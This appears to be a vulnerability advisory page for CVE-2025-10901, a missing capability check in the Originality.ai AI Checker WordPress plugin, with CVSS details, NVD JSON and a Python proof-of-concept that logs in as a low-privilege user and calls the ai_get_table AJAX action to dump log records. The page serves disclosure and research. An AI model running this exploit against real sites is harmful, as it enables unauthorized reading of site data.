Security Vulnerability Report
中文
CVE-2025-10901 CVSS 4.3 MEDIUM

CVE-2025-10901

Published: 2025-10-24 09:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Originality.ai AI Checker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ai_get_table' function in all versions up to, and including, 1.0.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read all data in the wp_originalityai_log database table, which can include post titles, scan scores, credits used, and other data.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Originality.ai AI Checker plugin <= 1.0.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-10901 PoC - Unauthorized data access in Originality.ai plugin # Target: WordPress site with Originality.ai AI Checker plugin <= 1.0.16 def exploit_cve_2025_10901(target_url, username, password): """ Exploit for CVE-2025-10901 Missing capability check in ai_get_table function allows authenticated users to read all data from wp_originalityai_log database table. """ session = requests.Session() # Step 1: Authenticate to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Exploit the vulnerability via admin-ajax.php exploit_url = f"{target_url}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'ai_get_table', 'draw': '1', 'start': '0', 'length': '100', 'search[value]': '', 'search[regex]': 'false' } response = session.post(exploit_url, data=exploit_data) if response.status_code == 200: try: data = response.json() if 'data' in data and len(data['data']) > 0: print(f"[+] Exploit successful! Found {len(data['data'])} records") print("\n[+] Sample data:") for record in data['data'][:5]: print(f" - Post ID: {record.get('post_id')}, Score: {record.get('score')}") return True else: print("[-] No data found or unexpected response format") except: print("[-] Failed to parse response") print("[-] Exploit failed") return False if __name__ == "__main__": if len(sys.argv) != 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_10901(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10901", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:41.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Originality.ai AI Checker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ai_get_table' function in all versions up to, and including, 1.0.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read all data in the wp_originalityai_log database table, which can include post titles, scan scores, credits used, and other data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/originality-ai/trunk/OriginalityAILogger.php#L202", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bf94803-1ddf-4b9b-9624-497db455aab2?source=cve", "source": "[email protected]"}]}}